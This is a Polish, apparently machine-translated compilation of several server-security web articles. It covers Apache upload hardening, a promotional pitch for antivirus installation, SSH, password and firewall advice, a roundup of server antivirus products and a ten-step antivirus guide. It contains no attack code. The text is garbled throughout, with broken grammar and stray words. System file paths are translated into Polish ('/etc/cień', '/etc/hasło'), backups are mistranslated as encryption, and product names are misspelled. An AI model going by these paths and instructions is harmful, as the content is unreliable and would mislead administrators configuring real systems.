- Zapobiegaj wykonywaniu języków programowania w katalogach obrazów za pomocą swojego serwera WWW. Aby to zrobić, spójrz w wiersze konfiguracyjne Apache, takie jak „AddType application/x-httpd-”, które kojarzą języki programowania z rozszerzeniami plików i zabraniają ich wykonywania w katalogach z obrazami. Dla Apache zakaz wykonywania plików języka PHP będzie konstruktem
  
  Rozkaz odmów, zezwól
  Odmowa od wszystkich
- W swoim języku programowania znajdź materiały, które uczą, jak bezpiecznie kodować podczas przetwarzania obrazów i prawidłowego przesyłania ich na serwer.

Osobiste podziękowania:

przyjaciel Alexander Pupyshev aka ryś za krytykę i rady
strona antichat.ru/
www.xakep.ru/
Książka Michaela Ebena, Briana Taimana. Administracja FreeBSD: sztuka równoważenia
książka autorstwa Joela Scambraya, Stuarta McClure'a, George'a Kurtza. Sekrety hakerów: Bezpieczeństwo sieci – gotowe rozwiązania. Druga edycja

Inne źródła informacji o ochronie:

Strona podręcznika bezpieczeństwa FreeBSD zawiera opis typowych problemów związanych z bezpieczeństwem i dobre praktyki administracyjne.
Zapisz się na listy mailingowe freebsd-security @ freebsd.org. Aby to zrobić, wyślij wiadomość e-mail na adres majordomo @ freebsd.org z subskrybcją freebsd-security w treści wiadomości. To właśnie na tej liście dyskusyjnej omawiane są najpilniejsze kwestie związane z bezpieczeństwem.
Strona z informacjami o bezpieczeństwie FreeBSD freebsd.org/security/
Dokument instruktażowy dotyczący bezpieczeństwa FreeBSD
Serwis CERT.org zawiera informacje nt luki w zabezpieczeniach ah w ochronie wszystkich systemów operacyjnych.
Zapory ogniowe i zabezpieczenia internetowe autorstwa Williama R. Cheswicka i Stevena M. Bellowina
Budowanie zapór internetowych, wydanie drugie, autorstwa Brenta Chapmana i Elizabeth Zwicky

Wynik:
Mam nadzieję, że artykuł pomógł ci zobaczyć wszystkie problemy razem, teraz administrator musi przeczytać o bezpieczeństwie komputera, bazach danych, serwerach WWW, językach programowania z dodatkowych źródeł. Krótko podsumowując artykuł, musisz być na bieżąco z wiadomościami o uwolnieniu problemów z bezpieczeństwem, aktualizować i sprawdzać wszystkie dane wejściowe pod kątem poprawności w swoich opracowaniach.
Niech moc będzie z Tobą!

Aby usługi oprogramowania firmy działały pomyślnie i bezawaryjnie, wysokiej jakości instalacja, I konfigurowanie ochrony antywirusowej. Dziś żadna firma nie może obejść się bez korzystania z Internetu do księgowości, korespondencji biznesowej, raportowania. System CRM jest bardzo popularny, ale jakość jego pracy zależy bezpośrednio od połączenia z globalną siecią.

Zalety instalacje oprogramowanie chroniące przed wirusami

Antywirus produkty działają ochrona różne poziomy. Programy pomagają zapobiegać problemom, takim jak:

kradzież informacji poprzez zdalny dostęp do serwer, w tym o charakterze poufnym (na przykład dane umożliwiające dostęp do kont firmowych);
wprowadzenie do systemu operacyjnego różnych aplikacji klienckich w celu przeprowadzania ataków DDoS;
awaria sprzętu firmy z powodu szkodliwego działania różnych programów;
blokowanie, uszkodzenie programów niezbędnych do działania i serwery;
kradzież, fałszowanie lub zniszczenie poufnych danych.

Podsumowując, wniosek będzie jeden – realizacja antywirusowe baza pomoże firmie uniknąć dużych strat finansowych. Co więcej, dotyczy to nie tylko zapobiegania ewentualnym włamaniom serwery, ale także w celu zachowania funkcjonalności sprzętu i płatnych systemów internetowych. Dlatego pytanie ustawienia jakościowo i wydajnie ochrona zawsze aktualne dla firm każdej wielkości.

Najpopularniejsze oprogramowanie do instalacje w biurze

Najczęściej klienci wolą ustawienie różne wersje antywirusa Kaspersky. Popularność tego oprogramowania wynika z następujących cech:

duża ilość opcji zarówno dla małych, średnich jak i dużych firm, osobna linia do użytku domowego;
kompleksy oprogramowania Kaspersky zaprojektowany dla instalacja nie tylko w biurze serwery, ale także na telefony komórkowe, laptopy;
serwery współpraca, poczta, różne pliki są bezpiecznie chronione środek przeciwwirusowy produkt
antywirus Kaspersky przeciwdziała atakom na bramki internetowe;
ustawienie produkt eliminuje wewnętrzne zagrożenie atakiem serwery, ponieważ implikuje to zróżnicowanie praw użytkowników.

Wśród innych korzyści instalacje określonego systemu antywirusowego – backup danych, przechowywanie haseł oraz automatyczne uzupełnianie formularzy internetowych w trybie bezpiecznym, uniemożliwiającym dostęp do serwery spam, phishing. Poza tym cena ochrona te produkty są bardzo korzystne. Dla użytkowników, którzy są mało zorientowani w zawiłościach programowania, twórcy programów antywirusowych Kaspersky stworzył wygodny, prosty i intuicyjny interfejs.

Na co zwrócić uwagę przy wyborze oprogramowania zabezpieczającego?

chronić co serwery obliczane jest specyficzne oprogramowanie: domowe, małe i średnie firmy, duże firmy;
zakres proponowanych programów lokalnych serwery biznes;
ciągłość pracy, częstotliwość i warunki aktualizacji;
możliwość scentralizowanego zarządzania systemem antywirusowym;
kompatybilność proponowanego produktu z zainstalowanymi programami biznesowymi i innym oprogramowaniem.

Ważnym punktem jest również wybór firmy, która wdraża takie produkty. Wykwalifikowany pracownik w możliwie najkrótszym czasie skonfiguruje poprawną pracę i poinstruuje klientów, jak korzystać z narzędzi programu podczas pracy z serwery. Koszt świadczenia takich usług odgrywa ważną rolę - w naszej firmie jest to zawsze bardzo opłacalne.

Nie da się raz na zawsze zabezpieczyć serwera przed dostępem z zewnątrz, ponieważ każdego dnia odkrywane są nowe podatności i pojawiają się nowe sposoby włamania na serwer. W tym artykule porozmawiamy o ochronie serwerów przed nieautoryzowanym dostępem.

Serwery każdej firmy mogą prędzej czy później stać się celem hakerów lub ataku wirusów. Zwykle skutkiem takiego ataku jest utrata danych, utrata reputacji lub strata finansowa, dlatego w pierwszej kolejności należy zająć się kwestiami bezpieczeństwa serwera.

Należy rozumieć, że ochrona przed włamaniem do serwera to zestaw środków, w tym takich, które implikują stałe monitorowanie pracy serwera i pracę nad poprawą ochrony. Nie da się raz na zawsze zabezpieczyć serwera przed dostępem z zewnątrz, ponieważ każdego dnia odkrywane są nowe podatności i pojawiają się nowe sposoby włamania na serwer.

W tym artykule porozmawiamy o ochronie serwerów przed nieautoryzowanym dostępem.

Sposoby i metody ochrony serwerów przed nieautoryzowanym dostępem

Ochrona fizyczna serwera

Ochrona fizyczna. Pożądane jest, aby serwer znajdował się w bezpiecznym centrum danych, pomieszczeniu zamkniętym i strzeżonym, osoby postronne nie powinny mieć dostępu do serwera.

Skonfiguruj uwierzytelnianie SSH

Podczas konfigurowania dostępu do serwera użyj uwierzytelniania kluczem SSH zamiast hasła, ponieważ takie klucze są znacznie trudniejsze, a czasami po prostu niemożliwe do złamania przy użyciu wyszukiwania siłowego.

Jeśli uważasz, że nadal potrzebujesz hasła, pamiętaj o ograniczeniu liczby prób jego wprowadzenia.

Zwróć uwagę, jeśli podczas logowania zobaczysz komunikat podobny do tego:

Ostatnie nieudane logowanie: Wt 28 września 12:42:35 MSK 2017 z 52.15.194.10 na ssh:notty
Od ostatniego udanego logowania było 8243 nieudanych prób logowania.

Może to oznaczać, że Twój serwer został zhakowany. W takim przypadku, aby skonfigurować bezpieczeństwo serwera, zmień port SSH, ogranicz listę adresów IP, z których możliwy jest dostęp do serwera, lub zainstaluj oprogramowanie, które automatycznie blokuje zbyt częste i podejrzane działania.

Regularnie instaluj najnowsze aktualizacje

Aby zapewnić ochronę serwera, instaluj na czas najnowsze poprawki i aktualizacje oprogramowania serwera, z którego korzystasz - system operacyjny, hypervisor, serwer bazy danych.

Zaleca się codzienne sprawdzanie nowych poprawek, aktualizacji i zgłoszonych błędów/luk w zabezpieczeniach, aby zapobiec atakom wykorzystującym luki dnia zerowego. Aby to zrobić, zasubskrybuj wiadomości od firmy programistycznej, śledź jej strony w sieciach społecznościowych.

Chroń hasła

Zdecydowanie jednym z najczęstszych sposobów uzyskania dostępu do serwera jest złamanie hasła serwera. Dlatego postępuj zgodnie ze znanymi, ale mimo to istotnymi zaleceniami, aby nie pozostawiać serwera bez ochrony:

nie używaj haseł łatwych do odgadnięcia, takich jak nazwa firmy;
jeśli nadal używasz domyślnego hasła do konsoli administracyjnej, zmień je natychmiast;
hasła do różnych usług muszą być różne;
jeśli musisz udostępnić komuś swoje hasło, nigdy nie wysyłaj swojego adresu IP, nazwy użytkownika i hasła w tej samej wiadomości e-mail lub komunikatorze;
Możesz skonfigurować weryfikację dwuetapową, aby zalogować się na konto administratora.

zapora ogniowa

Upewnij się, że serwer ma , jest skonfigurowany i działa cały czas.
Chroń zarówno ruch przychodzący, jak i wychodzący.
Śledź, które porty są otwarte iw jakim celu, nie otwieraj niczego niepotrzebnego, aby zmniejszyć liczbę możliwych podatności na włamanie do serwera.

W szczególności zapora ogniowa jest bardzo pomocna w ochronie serwera przed atakami ddos, ponieważ możesz szybko tworzyć blokujące reguły zapory i dodawać adresy IP, z których pochodzi atak, lub blokować dostęp do niektórych aplikacji za pomocą określonych protokołów.

Monitorowanie i wykrywanie włamań

Ogranicz oprogramowanie i usługi działające na twoim serwerze. Okresowo sprawdzaj wszystko, co masz uruchomione, a jeśli zostaną znalezione nieznane procesy, natychmiast je usuń i rozpocznij sprawdzanie, czy nie ma wirusów.
Okresowo sprawdzaj, czy nie ma śladów manipulacji. O włamaniu mogą świadczyć nowe konta użytkowników, których nie utworzyłeś, nie przeniosłeś ani nie usunąłeś pliku /etc/syslog.conf, usunięte pliki /etc/cień I /etc/hasło .
Monitoruj swój serwer, miej oko na jego normalną prędkość i przepustowość, abyś mógł zauważyć odchylenia, na przykład, gdy obciążenie serwera stało się znacznie większe niż zwykle.

Korzystanie z VPN i szyfrowania SSL/TLS

Jeśli wymagany jest zdalny dostęp do serwera, musi być dozwolony tylko z określonych adresów IP i odbywać się przez VPN.

Kolejnym krokiem w zapewnieniu bezpieczeństwa może być ustawienie protokołu SSL, który nie tylko zaszyfruje dane, ale również weryfikuje tożsamość innych uczestników infrastruktury sieciowej poprzez wydawanie im odpowiednich certyfikatów.

Kontrola bezpieczeństwa serwera

Dobrym pomysłem byłoby samodzielne sprawdzenie bezpieczeństwa serwera metodą pentest, tj. symulację ataku, aby znaleźć potencjalne luki i wyeliminować je na czas. Wskazane jest zaangażowanie w to specjalistów bezpieczeństwo informacji, jednak niektóre testy można przeprowadzić niezależnie za pomocą programów do hakowania serwerów.

Co jeszcze zagraża serwerom oprócz hakowania

Serwer może przestać działać z wielu powodów innych niż włamanie. Może to być na przykład infekcja złośliwym oprogramowaniem lub po prostu fizyczna awaria jednego z komponentów.

Dlatego środki ochrony serwera powinny obejmować:

Instalowanie i aktualizowanie programów chroniących serwer - antywirusy.
Regularnie szyfruj kopie danych przynajmniej raz w tygodniu, bo według statystyk serwerowe dyski twarde są na pierwszym miejscu pod względem częstotliwości awarii. Upewnij się, że kopia zapasowa jest przechowywana w fizycznie bezpiecznym środowisku.
Zapewnienie ciągłości zasilania serwerowni.
Terminowa fizyczna profilaktyka serwerów, w tym czyszczenie ich z kurzu i wymiana pasty termicznej.

Doświadczenie specjalistów Integrus mówi nam, że najlepszą ochroną przed tego typu zagrożeniami jest stosowanie najlepszych praktyk z zakresu systemów ochrony serwerów.

Aby zapewnić bezpieczeństwo serwerów naszych klientów, stosujemy kombinację narzędzi: firewalli, antywirusów, technologii bezpieczeństwa/zarządzania zdarzeniami (SIM/SEM), technologii wykrywania/ochrony przed włamaniami (IDS/IPS), technologii analizy behawioralnej sieci (NBA) , oczywiście regularna konserwacja prewencyjna serwerów oraz aranżacja bezpiecznych serwerowni pod klucz. Pozwala to zminimalizować ryzyko włamania lub awarii serwera z innych powodów.

Jesteśmy gotowi przeprowadzić audyt bezpieczeństwa serwerów Twojej firmy, skonsultować się ze specjalistami, wykonać wszelkiego rodzaju prace związane z ustawieniem ochrony sprzętu serwerowego.

Serwer to wyspecjalizowany komputer, na którym działania odbywają się bez aktywnego udziału użytkownika. Zazwyczaj jest serwis oprogramowanie do wykonania określonych zadań. Za pośrednictwem takiego komputera wymieniane są dane, uruchamiane są działania, wykonywane są obliczenia matematyczne i wiele więcej. Wszystkie serwery różnią się typami, na przykład istnieją serwery do gier, WWW, poczty i proxy. Każde takie urządzenie wykonuje jasno określone zadanie. Często w celu bezpiecznego działania takiej maszyny instalowany jest na niej program antywirusowy, dlatego chcielibyśmy opowiedzieć więcej o takim oprogramowaniu, podkreślając kilka konkretnych rozwiązań.

Platforma: Windows Server

Znana firma antywirusowa Avast wydaje zestaw specjalnie dla serwerów, zapewniając dodatkowe przydatne narzędzia. Na przykład spójrz na funkcję „Niszczenie danych”. Jest zaimplementowany w taki sposób, że nadpisuje losowo wygenerowane informacje we wszystkich usuniętych danych, co nie pozwoli na odtworzenie pierwotnego stanu pliku przy próbie jego przywrócenia. Ponadto istnieje „Analiza zachowania”- narzędzie odpowiedzialne za skanowanie aplikacji do pracy pod kątem podejrzanej aktywności. Jeśli notatnik spróbuje uzyskać dostęp do tej samej kamery internetowej, takie żądanie zostanie natychmiast zablokowane. Oczywiście taki przykład jest prosty, ale funkcja działa na wyższym poziomie.

Avast Business Antivirus Pro ma również wbudowaną zaporę ogniową, inteligentne skanowanie, ochronę przed spamem, ochronę hasłem i łatwiejsze logowanie do konta. Istnieje również stałe porównanie prawdopodobnych zagrożeń z aktualną bazą wirusów przy użyciu technologii Software Defender. Pozwoli Ci to na interakcję tylko ze zweryfikowanymi danymi. Z kolei narzędzie CyberCapture wyśle podejrzane obiekty do laboratorium zagrożeń.

Serwer antywirusowy Avira

Platforma: Windows Server

Avira Antivirus Server to specjalne rozwiązanie firmy deweloperskiej dla serwerów z systemem operacyjnym Windows. Twórcy obiecują maksimum wydajna praca przy niskim zużyciu zasobów systemowych, wysokim współczynniku wykrywania zagrożeń i łatwości obsługi. Zespół dodał narzędzia do ochrony dostępu, to znaczy monitoruje uruchomione procesy, gdy inne aplikacje uzyskują do nich dostęp. Istnieje również skanowanie ręczne, które pozwala w dowolnym momencie rozpocząć analizę określonego nośnika lub osobnego katalogu.

Po raz kolejny zauważamy, że deweloper kładzie szczególny nacisk na niskie zużycie zasobów komputera i łatwość zarządzania antywirusem. Obiecane są również ciągłe bezpłatne innowacje i aktualizacje bazy wirusów. Jeśli jesteś zainteresowany zapoznaniem się z tym produktem, możesz otrzymać bezpłatną wersję na okres 30 dni na oficjalnej stronie internetowej, wypełniając odpowiedni formularz. Podczas testów dostępne będą wszystkie narzędzia i funkcje, a także bezpłatny kontakt z obsługą klienta.

Bezpieczeństwo plików ESET

ESET File Security jest przeznaczony do pracy na serwerach Windows i Linux i zapewnia wielowarstwową ochronę dzięki dodatkowemu komponentowi chmurowej piaskownicy ESET Dynamic Threat Defense. Oparty na chmurze system ochrony automatycznie chroni przed nowymi zagrożeniami, nie czekając na aktualizację silnika detekcji (określony średni czas aktualizacji to 20 minut). Wbudowana ochrona przed atakami sieciowymi rozpoznaje znane luki w zabezpieczeniach na poziomie sieci, a podczas korzystania z usługi OneDrive silnik Office 365 OneDrive Storage ją przeskanuje. Należy również zwrócić uwagę na zapobieganie wpływowi botnetów. Narzędzie nie tylko znajduje złośliwe połączenie, ale także wykrywa te same procesy, natychmiast blokując niebezpieczną aktywność i powiadamiając o tym użytkownika.

Aby zarządzać programem ESET File Security, użytkownik jest proszony o zainstalowanie konsoli w systemie Windows lub Linux, a do uproszczenia konfiguracji dostępne jest wirtualne urządzenie importujące. Możesz zapoznać się ze wszystkimi funkcjami tego programu antywirusowego, wypróbować jego darmową wersję i kupić pełną na oficjalnej stronie programistów.

zabezpieczenia kasperskiego

Platforma: Windows Server, Linux

Kaspersky Security for Servers jest zawarty w zestawach — Total, Endpoint Security for Business, Kaspersky Security for Virtual and Cloud Environments oraz Kaspersky Security for Storage Systems. Kupując jedną z tych wersji, otrzymujesz niezawodną ochronę swojego serwera najnowsza generacja złośliwe oprogramowanie. Omawiane oprogramowanie posiada zaawansowaną ochronę serwerów i zapewnia ochronę przed exploitami, ochronę serwerów terminali, monitoruje ruch zewnętrzny, integralność systemu oraz stale chroni systemy przechowywania danych za pomocą wielopoziomowego narzędzia. Wbudowane systemy zarządzania uprawnieniami administratora zapewniają łatwość zarządzania, powiadomień, a także integrację z systemami SIEM i zarządzanie zaporą sieciową Windows.

Chciałbym zauważyć, że Kaspersky Security ma oddzielne wymagania systemowe dla konkretnych platform pamięci masowej, np. dla NetApp - Clustered Data ONTAP 8.x i 9.x oraz Data ONTAP 7.x i 8.x w trybie 7-mode, a dla EMC Isilon - IBM System Storage N series. Możesz zapoznać się z listą wszystkich wymagań podczas pobierania programu antywirusowego na stronie Kaspersky.

McAfee VirusScan Enterprise

Platforma: Windows Server, Linux

Wcześniej użytkownicy instalowali McAfee Endpoint Security na swoich serwerach, ale twórcy postanowili udoskonalić ten produkt poprzez kolejną zmianę jego nazwy. Teraz jest to VirusScan Enterprise. Każdemu, kto wcześniej korzystał z tego programu antywirusowego, oferowana jest bezpłatna migracja. Oficjalna strona internetowa zawiera wszystkie niezbędne instrukcje i lekcje na ten temat. do podstawowego zestawu narzędzi Nowa wersja obejmuje: zaporę ogniową, kontrole sieciowe do komunikacji o zagrożeniach, obowiązkowy program antywirusowy i opcje zapobiegania wykorzystaniu luk w zabezpieczeniach.

McAfee VirusScan Enterprise wykorzystuje również nowoczesne techniki uczenia maszynowego. Takie technologie umożliwiają wykrywanie złośliwego kodu za pomocą atrybutów statycznych i behawioralnych. Złośliwe oprogramowanie jest blokowane, gdy tylko dostanie się do systemu, zapobiegając infekowaniu innych procesów. Za wykrywanie i reagowanie na punkty końcowe odpowiada technologia Endpoint Detection i Tesponse - pozwoli to zareagować na zagrożenia jednym kliknięciem.

Comodo Antivirus dla Linuksa

Platforma: Linuks

Twórcy Comodo Antivirus zaprezentowali oddzielną wersję dla systemów operacyjnych opartych na jądrze Linux. Ten program jest obsługiwany przez większość dystrybucji, zarówno 32-bitowych, jak i 64-bitowych.Z funkcji od razu chciałbym zwrócić uwagę na filtr poczty, który jest kompatybilny z popularnymi agentami pocztowymi: Postfix, Qmail, Sendmail i Exim MTA. Producent gwarantuje niezawodną ochronę w czasie rzeczywistym, łatwość instalacji i brak skomplikowanych kroków konfiguracyjnych. System antyspamowy można całkowicie edytować ręcznie, ale zapewnią to standardowe ustawienia dobra filtracja. Jeśli użytkownik chce uzyskać jeszcze większą kontrolę nad plikami, dostępna jest funkcja do włączenia „Analiza zachowania w czasie rzeczywistym”. Wszystkie podejrzane obiekty zostaną przesłane do serwera analizy zachowania w chmurze.

Do komfortowego korzystania z Comodo Antivirus potrzebny będzie komputer o dużej mocy z procesorem o minimalnej częstotliwości 2 GHz i 2 GB wolnej pamięci RAM. Nie musisz się martwić o uruchamianie skanów: wystarczy raz skonfigurować ich plan, a w przyszłości będą uruchamiane automatycznie. Możliwe jest rozpoczęcie analizy w dowolnym dogodnym momencie poprzez naciśnięcie tylko jednego przycisku. Antywirus, o którym mowa, jest open source, dystrybuowany bezpłatnie i pobierany z oficjalnej strony internetowej.

Chrootkit

Platforma: Linuks

Chkrootkit (Check Rootkit) to program szeroko stosowany przez administratorów systemu do ochrony systemu operacyjnego przed znanymi rootkitami. Rootkit to zbiór komponentów, takich jak skrypty, pliki wykonywalne lub pliki konfiguracyjne, które pełnią funkcję maskowania, kontrolowania i gromadzenia danych. Za pomocą takich narzędzi osoby atakujące penetrują system operacyjny i uzyskują wszystkie niezbędne informacje. Wspomniane powyżej oprogramowanie ma na celu ochronę komputera przed tego rodzaju działaniami. Chrootkit nie wymaga instalacji i można go uruchomić z Live CD. Praca w nim odbywa się za pomocą dowolnej wygodnej konsoli, a zarządzanie jest jasne nawet dla niedoświadczonego użytkownika.

Chkrootkit działa dość szybko, dobrze spełnia swoje zadanie, nie zajmuje dużo miejsca na dysku, ale jednocześnie zawiera ogromną liczbę modułów dla każdego typu użytkownika. Na oficjalnej stronie znajdują się asemblery programu w różnych rozszerzeniach, a pobieranie jest dostępne z bezpośredniego źródła lub kilku serwerów lustrzanych.

Zostałeś wprowadzony do rozwiązań antywirusowych, które staną się najlepsze rozwiązanie Dla różne rodzaje serwery. Jak widać, każde oprogramowanie ma swoje własne cechy, więc będzie najbardziej przydatne w określonych sytuacjach.

Jak właściwie zorganizować obronę sieci komputerowych przed złośliwym oprogramowaniem.

Artykuł skierowany jest do początkujących administratorów systemów.

Przez ochronę antywirusową rozumiem ochronę przed wszelkiego rodzaju złośliwym oprogramowaniem: wirusami, trojanami, rootkitami, backdoorami,…

1 Krok ochrony antywirusowej - zainstaluj oprogramowanie antywirusowe na każdym komputerze w sieci i aktualizuj je przynajmniej raz dziennie. Poprawny schemat aktualizacje antywirusowych baz danych: 1-2 serwery zajmują się aktualizacjami i dystrybuują aktualizacje do wszystkich komputerów w sieci. Pamiętaj, aby ustawić hasło, aby wyłączyć ochronę.

Oprogramowanie antywirusowe ma wiele wad. Główną wadą jest to, że nie łapią wirusów napisanych na zamówienie i które nie są powszechnie używane. Drugą wadą jest to, że ładują procesor i zajmują pamięć na komputerach, niektóre więcej (Kaspersky), niektóre mniej (Eset Nod32), należy to wziąć pod uwagę.

Instalacja oprogramowania antywirusowego jest obowiązkowym, ale niewystarczającym sposobem ochrony przed epidemiami wirusów, często sygnatura wirusa pojawia się w antywirusowych bazach danych następnego dnia po jego dystrybucji, w ciągu 1 dnia wirus może sparaliżować działanie dowolnej sieci komputerowej.

Zwykle administratorzy systemu zatrzymują się na kroku 1, co gorsza, nie wykonują go lub nie śledzą aktualizacji i prędzej czy później infekcja nadal występuje. Poniżej wymienię inne ważne kroki w celu wzmocnienia ochrony antywirusowej.

Krok 2 Zasady dotyczące haseł. Wirusy (trojany) mogą infekować komputery w sieci poprzez odgadywanie haseł do standardowych kont: root, admin, Administrator, Administrator. Zawsze używaj skomplikowanych haseł! W przypadku kont bez haseł lub z prostymi hasłami administrator systemu powinien zostać zwolniony z odpowiednim wpisem w skoroszycie. Po 10 próbach podania błędnego hasła konto powinno zostać zablokowane na 5 minut w celu ochrony przed brute force (zgadywanie hasła poprzez proste wyliczenie). Zdecydowanie zaleca się zmianę nazwy i wyłączenie wbudowanych kont administratora. Hasła należy okresowo zmieniać.

3 Krok. Ograniczenie praw użytkownika. Wirus (trojan) rozprzestrzenia się w sieci w imieniu użytkownika, który go uruchomił. Jeśli prawa użytkownika są ograniczone: nie ma dostępu do innych komputerów, nie ma praw administracyjnych do jego komputera, to nawet uruchomiony wirus nie będzie w stanie niczego zainfekować. Często zdarza się, że sami administratorzy systemu stają się winowajcami rozprzestrzeniania się wirusa: uruchomili generację klucza administratora, a wirus zainfekował wszystkie komputery w sieci ...

4 Krok. Regularna instalacja aktualizacji zabezpieczeń. To ciężka praca, ale trzeba to zrobić. Musisz zaktualizować nie tylko system operacyjny, ale także wszystkie aplikacje: DBMS, serwery pocztowe.

Krok 5 Ograniczenie dróg przenikania wirusów. Wirusy dostają się do sieci lokalnej przedsiębiorstwa na dwa sposoby: poprzez nośniki wymienne oraz przez inne sieci (Internet). Odmawiając dostępu do USB, CD-DVD, całkowicie blokujesz 1 sposób. Ograniczając dostęp do Internetu, blokujesz drugą ścieżkę. Ta metoda jest bardzo skuteczna, ale trudna do wdrożenia.

6 Krok. Firewalle (ITU), to też firewalle (firewalle), to też firewalle. Muszą być zainstalowane na granicach sieci. Jeśli komputer jest bezpośrednio podłączony do Internetu, ITU musi być włączone. Jeśli komputer jest podłączony tylko do sieci lokalnej (LAN) i uzyskuje dostęp do Internetu i innych sieci za pośrednictwem serwerów, nie jest konieczne włączanie ITU na tym komputerze.

Krok 7 Dzielenie sieci firmowej na podsieci. Wygodnie jest rozbić sieć zgodnie z zasadą: jeden dział w jednej podsieci, inny dział w innej. Podsieci można podzielić na warstwę fizyczną (SCS), warstwę łącza danych (VLAN), warstwę sieciową (podsieci nieprzecinane adresami IP).

Krok 8 Windows ma wspaniałe narzędzie do zarządzania bezpieczeństwem dużych grup komputerów - są to zasady grupy (GPO). Dzięki GPO możesz skonfigurować komputery i serwery tak, aby infekcja i dystrybucja złośliwego oprogramowania była prawie niemożliwa.

Krok 9 Dostęp do terminala. Postaw w sieci 1-2 serwery terminali, za pośrednictwem których użytkownicy będą mieli dostęp do Internetu, a prawdopodobieństwo infekcji ich komputerów osobistych spadnie do zera.

Krok 10 Śledzenie wszystkich procesów i usług uruchomionych na komputerach i serwerach. Możesz zrobić tak, aby w przypadku uruchomienia nieznanego procesu (usługi) administrator systemu został powiadomiony. Komercyjne oprogramowanie, które może to zrobić, kosztuje dużo, ale w niektórych przypadkach koszty są uzasadnione.